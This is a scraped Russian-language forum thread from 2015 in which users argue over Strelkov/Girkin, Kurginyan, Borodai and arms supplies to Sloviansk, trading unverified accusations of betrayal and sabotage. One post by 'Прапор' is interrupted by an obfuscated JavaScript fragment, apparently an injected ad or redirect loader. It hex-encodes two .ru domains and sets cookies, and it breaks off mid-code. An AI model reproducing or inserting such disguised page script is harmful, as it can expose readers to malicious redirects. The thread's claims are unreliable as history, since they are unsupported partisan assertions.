Стрелков или Гиркин? Ополчение Донбасса: события, факты, люди.
3,463,423 7,657
 

  Удаленный пользователь
31 июл 2015 15:29:42

Тред №978251

новая дискуссия Дискуссия  974

Кстати, Кургинян говорил, что Гиркин сдал Славянск как раз в тот момент, когда канал поставок был налажен.

Со словами Сергей Николаевича как раз сходится.
Отредактировано: Adamantit - 31 июл 2015 19:31:34
  • -0.26 / 10
  • АУ
ОТВЕТЫ (76)
 
 
  НЕХОРОШИЙ ( Слушатель )
  31 июл 2015 15:35:20

Без оценки Кургиняна- канал на тот момент работал исправно уже более месяца.
  • +0.49 / 19
  • АУ
 
 
  Удаленный пользователь
31 июл 2015 15:39:12


А как же ржавые автоматы предьявленные в качестве "помощи России" на конференции, когда Губарев приехал арестовывать Кургиняна?

На том что Гиркину не оказывали помощь столько всего строилось..

Гм..
  • -0.32 / 6
  • АУ
 
 
 
  AndreyK-AV ( Слушатель )
31 июл 2015 15:52:30

Гм..
Всегда по прошествии времени, очень многим становится нужно чтобы в прошлом ржавчина очистилась, стволы распрямились, и все текло рекой без помех. 
Притом причины самые разные. 
Только в разговоре с героем большого зелёного дивана сказано было много, особенно про ржавчину и на оружие и в душе, несмотря на ерничание героя с дивана над погибшей бронегрупой, и это запомнилось, не вытравишь.
Кстати, почему Вы не возмущаетесь не исполнением Губаревым приказа? (Губарев же сам говорил что он у него в кармане лежал. Правда СН говорит что не знает кто бы мог такой приказ Губареву отдать, но для Вас же личное признание царица доказательств.Подмигивающий)
  • +0.31 / 9
  • АУ
 
 
 
 
  Прапор ( Слушатель )
  31 июл 2015 15:56:13

Кургиняна , охраняли осетины Востока , имевшие любовь до гроба с Борадаем и его начальниками . В тот момент Бородай лихорадочно искал рычаги декредитации Стрелкова , и создавал в том числе и такие как с Кургиняном комбинации .
  • +0.91 / 17
  • АУ
 
 
 
 
 
  Kate_Dark ( Слушатель )
  31 июл 2015 16:30:43

Доброго дня. Можете ли Вы озвучить причины подобных действий со стороны Бородая? 
  • +0.21 / 5
  • АУ
 
 
 
 
 
 
  r01338 ( Слушатель )
  31 июл 2015 16:39:37

А вопрос, как так получилось, что Бородай на тот момент всячески защищал и выгораживал Стрелкова, и наезжал на СЕК, вас разве не интересует? Навскидку вот:

http://www.gazeta.ru…2901.shtml

Цитата
Премьер-министр самопровозглашенной Донецкой народной республики Александр Бородай прокомментировал обвинение лидера движения «Суть времени» Сергея Кургиняна в адрес Игоря Стрелкова в сдаче Славянска украинской армии, передает корреспондент «Газеты.Ru».

«У меня есть по этому поводу собственное мнение, оно очень простое: Кургинян не просто неконструктивно критикует, во-первых, это бред сивой кобылы, во-вторых, это редкая наглость, то, что он несет. Если Кургинян любит цитаты разного рода поэтов, я ему напомню Шота Руставели: «Каждый мнит себя стратегом, видя бой со стороны», — цитирует Бородая пресс-центр «Юго-Восток».

«Я сейчас в Москве, вернусь в Донецкую народную республику, может, отправлю Кургиняна туда, куда ему и положено отправиться, поскольку он работает, видимо, заодно с украинской пропагандистской машиной, можно отправить его на Украину», — заявил премьер-министр ДНР Александр Бородай.
...

  • -0.13 / 5
  • АУ
 
 
 
 
 
 
 
  Kate_Dark ( Слушатель )
31 июл 2015 16:51:29
Сообщение удалено

31 июл 2015 18:01:33

  • +0.01
 
 
 
 
 
 
 
  Прапор ( Слушатель )
  31 июл 2015 17:03:11
  • +0.15 / 2
  • АУ
 
 
 
 
 
 
 
  Прапор ( Слушатель )
  31 июл 2015 17:05:07

Не более чем трёп ботана пытающегося остаться в патриотической среде , в которую его привёл Стрелков .  Все наши общие друзья считают его предателем и это мнение уже не измениться никогда .
  • +0.22 / 9
  • АУ
 
 
 
 
 
 
 
 
  r01338 ( Слушатель )
  31 июл 2015 17:10:53

Я понял, что вы считаете его предателем. У меня лишь вопрос: как ВЫ считаете, с какого момента он им стал? Я-то лично считаю, что он поменял отношение к Стрелкову уже после своей отставки.
  • -0.12 / 4
  • АУ
 
 
 
 
 
 
 
 
 
  Прапор ( Слушатель )
  31 июл 2015 17:17:26

Находясь уже в Донецке , когда Стрелков был в Славянске.Он передовал вооружение в том числе и технику Востоку и Оплоту .Когда Стрелков был уже в Донецке , он уже вместе с Хмурым играл против Стрелкова .Борадай лгал и дезынформировал Стрелкова , Хмурый саботировал разведдеятельность  .Оба знали когда и в каком месте подует северный ветер .Эпизод с Викой -Викой не более чем эпизод по провоцированию Стрелкова на действия , которые потом можно было бы итрепритировать . как несостоятельность руководства .
  • +0.05 / 12
  • АУ
 
 
 
 
 
 
 
 
 
 
  НЕХОРОШИЙ ( Слушатель )
  31 июл 2015 17:24:56

Каким это образом???????
  • +0.56 / 22
  • АУ
 
 
 
 
 
 
 
 
 
 
 
  Прапор ( Слушатель )
  31 июл 2015 17:39:50

Отсутствием  достоверных разведданных . Появление танков укров под Шахтёрском было для начальника разведки полной неожиданностью .А  на требование Стрелкова немедленно послать в Шахтёрск разведку и доложить о состоянии дел , жалкие оправдания . что у него все люди в распыле .  При штурме Мариновки , все с удивлением узнали . что в этом населённом пункте не один а два блок поста , и это при том . что батальон Тора уже две недели сидел на её окраине в Степановке .На мой взгляд это полный делентализм .Я как руководитель Южного направления обороны , видел только очковтирание и нежелание работать .
  • +0.08 / 8
  • АУ
 
 
 
 
 
 
 
 
 
 
 
 
  НЕХОРОШИЙ ( Слушатель )
  31 июл 2015 17:48:51

1- Это ложь,батальон Дружка был именно по моему настоянию снят с Петровки и отправлен в Шахтерск, когда я ТРИ ДНЯ докладывал Стрелкову о движении колон ВСУ.2-  именно моя разведка вытаскивал раненых, брошены на 20 блок-посту у Шахтерска. Именно мои корректировали огонь артиллерии "Кальмиуса". Все остальные находились в Дибровке и уж Прапору это должно быть известно.3- интересно, а не Прапор ли совместно с НШ Ромой в Снежном не мог ответить на простейшие вопросы по группировке ВСУ. С больной головы...
  • +0.51 / 21
  • АУ
 
 
 
 
 
 
 
 
 
 
 
 
 
  centurion ( Слушатель )
31 июл 2015 17:56:19
Сообщение удалено
centurion
31 июл 2015 18:02:36
Отредактировано: centurion - 31 июл 2015 18:02:36

  • +0.01
 
 
 
 
 
 
 
 
 
 
  r01338 ( Слушатель )
  31 июл 2015 17:25:06

Серьезные обвинения нуждаются в серьезных доказательствах.
  • +0.15 / 9
  • АУ
 
 
 
 
 
 
 
 
 
 
 
  НЕХОРОШИЙ ( Слушатель )
31 июл 2015 17:28:09

Их не будет, тем более это не Прапор, а левый пассажир.
  • +0.76 / 18
  • АУ
 
 
 
 
 
 
 
 
 
 
 
 
  MsMV ( Слушатель )
31 июл 2015 17:32:08

Ну вот... а я уже приготовилась выслушать караван офигительных историй))
Ладно, что уж, видать не судьба)))
Подождем самого предводителя, по всей логике - следующим должен он пожаловать)))
  • -0.04 / 13
  • АУ
 
 
 
 
 
 
 
 
 
 
 
 
 
  Север Крайний ( Слушатель )
31 июл 2015 17:38:02

Стрелков и логика? Вы к нему очень добры. А грязи на СН следовало ожидать. Ведь сегодня опять пятница
  • +0.11 / 10
  • АУ
 
 
 
 
 
 
 
 
 
 
 
 
 
 
  MsMV ( Слушатель )
31 июл 2015 17:43:04

Танки грязи не боятся)
Да и хлопотно это, генерал на порядок умнее всей этой свистобратии оптом.
  • -0.10 / 12
  • АУ
 
 
 
 
 
 
 
 
 
 
 
  Прапор ( Слушатель )
  31 июл 2015 17:41:18

Вам нужны накладные ?
  • -0.04 / 4
  • АУ
 
 
 
 
 
 
 
 
 
 
 
 
  r01338 ( Слушатель )
  31 июл 2015 18:24:08

Не, не нужны. Лишнее.

Но они у вас есть, я правильно понял?
  • -0.11 / 3
  • АУ
 
 
 
 
 
 
 
 
 
 
  MsMV ( Слушатель )
31 июл 2015 17:25:58
Сообщение удалено
MsMV
31 июл 2015 17:33:01
Отредактировано: MsMV - 31 июл 2015 17:33:01

  • +0.00
 
 
 
 
 
 
 
 
 
 
  Не мой ник ( Слушатель )
  31 июл 2015 18:16:08

Если Хмурый (по Вашим словам), был "заодно" с Бородаем, тогда почему же Стрелков своё общение с Бородаем прервал, а с Хмурым ещё несколько месяцев прекрасно общался? 
  • +0.26 / 9
  • АУ
 
 
 
 
 
 
 
 
 
 
  Idi Amin ( Слушатель )
  31 июл 2015 18:23:14

Так-так-так. А вот здесь можно поподробнее? В вышенаписанном вы уверены, или это ваше предположение? За какой срок это по вашему мнению было им известно? Стрелков точно не был в курсе предстоящих событий? Или же его уведомили, перед так называемой отставкой?
  • +0.40 / 2
  • АУ
 
 
 
 
 
 
 
 
 
 
 
  НЕХОРОШИЙ ( Слушатель )
  31 июл 2015 18:25:54

Вы еще не поняли, что от персонажа с ником Прапор не дождетесь НИ-ЧЕ-ГО кроме голословных алогичных утверждений?
  • +0.50 / 22
  • АУ
 
 
 
 
 
 
 
 
 
 
 
 
  Саныч . ( Слушатель )
31 июл 2015 18:30:48

так это настоящий "Прапор" или нет?
  • +0.02 / 1
  • АУ
 
 
 
 
 
 
 
 
 
 
 
 
 
  НЕХОРОШИЙ ( Слушатель )
31 июл 2015 18:36:37

Не знаю. Информации недостаточно.1-Изначально на вопрос ответил неправильно. Затем мог связаться с настоящим Прапором или кем то из его группы, исправился. 2- слишком часто ссылается на забывчивостью по Ямполю, складывается ощущение что его кто то поправляет. Ну это субъективное. 
  • +0.84 / 33
  • АУ
 
 
 
 
 
 
 
 
 
 
 
 
  Idi Amin ( Слушатель )
31 июл 2015 18:30:57

Но ведь он подтвердил свою личность рассказом про разгрузку и "китайца" разве нет? Прочитать и принять к сведению свежую информацию от непосредственного участника не значит всё же принять её на веру. Это ко всем относится. Но чем больше информации, тем лучше.
  • +0.43 / 5
  • АУ
 
 
 
 
 
 
 
 
 
 
 
 
  Вредный ( Слушатель )
  31 июл 2015 18:55:57

Дааа мужики, как все закручено-то, что-то одни нестыковки пошли. Вот уж не поверю, что СН плохой спец,  поклонник Бородая и продался пятой колонне.
  • +0.61 / 20
  • АУ
 
 
 
 
 
 
 
 
 
 
 
 
 
  MsMV ( Слушатель )
  31 июл 2015 18:59:18

На девятой-то войне? Ну да, ну да, очень Плохой))
  • +0.27 / 23
  • АУ
 
 
 
 
 
 
 
 
 
 
 
 
 
 
  centurion ( Слушатель )
  31 июл 2015 19:06:18



Девять войн - это серьезно. А где можно увидеть весь их список?  Афган,  две Чечни, .... ? 
  • +0.23 / 2
  • АУ
 
 
 
 
 
 
 
 
 
 
 
 
 
  • Загрузить
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
  Aimp
  • Загрузить
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
  • Загрузить
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
  zap
  • Загрузить
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
  • Загрузить
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
  Atilla
  • Загрузить
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
  Atilla
  • Загрузить
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
  Atilla
  • Загрузить
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
  • Загрузить
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
  Atilla
  • Загрузить
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
  Atilla
  • Загрузить
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
  Atilla
  • Загрузить
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
  Анастасия Романовна ( Слушатель )
  31 июл 2015 20:20:39

На сколько мне помнится, могу ошибаться давно это было, то он был отстранен от своих обязанностей Стрелковым. И кажется не он один. А то, что он в Москве именно находился, так не в Киев же ему ехать...
  • +0.20 / 3
  • АУ
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
  Atilla
  • Загрузить
 
 
 
 
 
 
  Прапор ( Слушатель )
  31 июл 2015 16:47:26

Бородай, совершено случайная фигура на этой сцене , попавший туда только из за своего знакомства со Стрелковым .В момент паники во среде отвечающей за Украину .Тогда вчерашние герои  отказывались туда ехать пачками . Понимая , что праздник известности для него может скоро кончиться , он находясь в тот момент  чистым представителем , просто банально вербанулся представителями пятой колоны . и с тех пор работал только на них и выполняя . только их приказы .В том числе и по устранению с арены Гиркина .

window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="21153",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e
  • +0.65 / 19
  • АУ
 
 
 
 
 
 
 
  Kate_Dark ( Слушатель )
  31 июл 2015 17:00:47

Как Вам видятся цели "пятой колонны"?
1. Они хотят вернуть Новороссию в Украину на, скажем так, не совсем оскорбительных для России условиях, или
2. Создать в Новоросии псевдонезависимый анклав по типу Абхазии?
И какую роль в этой колонне играет господин Ахметов (если, конечно, есть на этот счет какие-то предположнния)?
  • +0.20 / 5
  • АУ
 
 
 
  НЕХОРОШИЙ ( Слушатель )
  31 июл 2015 16:02:05

А где вы видите противоречия? Я вроде по - русски пишу. Бардак с поставками как то- ржавые автоматы, оружие без боеприпасов к ним  продолжался почти до середины июня, после этого сбои прекратились, начала поступать и техника и тяжелое вооружение.
  • +0.49 / 15
  • АУ
 
 
 
 
  Удаленный пользователь
31 июл 2015 16:18:55


В ваших словах я вообще противоречий не вижу.

Просто я очень хорошо помню как люди Гиркина с Губаревым трясли перед журналистами ржавыми автоматами и говорили, что Россия не помогает, что виновата российская власть.

А им уже и техника и тяжёлое вооружение..

Про ржавые автоматы достаточно...
  • -0.55 / 14
  • АУ
 
 
 
 
 
  Roland Deschain ( Слушатель )
31 июл 2015 16:43:08
Сообщение удалено

31 июл 2015 17:46:34

  • +0.15
 
 
 
 
 
  AndreyK-AV ( Слушатель )
31 июл 2015 16:45:45

Т.е. врут все и СН тоже, только СЕК говорит правду.
Хорошо, значит по СЕК блокады не было и были хорошие безопасные магистрали, 
тогда подскажите сколько дивизионов артиллерии привезено в Славянск к 1 июля, 
сколько танковых рот или на худой конец взводов с обученными экипажами, (а зачем туда без экипажей?)
на какое количество батальонов иной бронетехники и сколько эшелонов боеприпасов для всего этого? 
Да и как доставлено все это, по каким магистралям?
А то ведут разговор толи про три, толи пять танков, и одну три ноны, и то что гражданские из города выехать не могли, так как дороги простреливаются, а оказывается!


Или все же "А им уже и техника и тяжёлое вооружение", в перспективе или в Донецке, при отсутствии желания деблокировать и контролируемых украми магистралях?
И ещё, если было в Донецке, то почему ждало до августа? Может все проще, не так много его было, и не так обучен был личный состав, и не было единого командования, и вся конспирология большого зеленого дивана, по большому счёту конспирология для отчётности и самопиара и имеющая параллельное отношение к реальным событиям?
  • +0.50 / 8
  • АУ
 
 
 
 
 
 
  Прапор ( Слушатель )
  31 июл 2015 16:57:43

На границе с Россией были созданы  филтрационные  структуры , созданные для недопущения поступления оружия к Стрелкову в полном объёме . Такие . как Восток , Оплот , и Козицин . Эти структуры были полностью атрофированными и выполняли роль вязкой плотины .
  • +0.47 / 13
  • АУ
 
 
 
  Прапор ( Слушатель )
  31 июл 2015 16:35:59

Оружие и в том числе автоматы приходили и в правду в ужасающем состоянии . После того , как .я был назначен комендантом Снежного , воочию убедился сколь огромны факты хищения оружия и боеприпасов по дороге в Славянск . Были созданы структуры накопления и временного складирования , где они безбожно разворовывались .Полная бесконтрольность и безнаказанность , по моему мнению созданные искусственно . В этой обстановке  никто , подчёркиваю , никто не мог точно знать , что и в каком количестве поступало в Славянск .
 
  • +0.42 / 15
  • АУ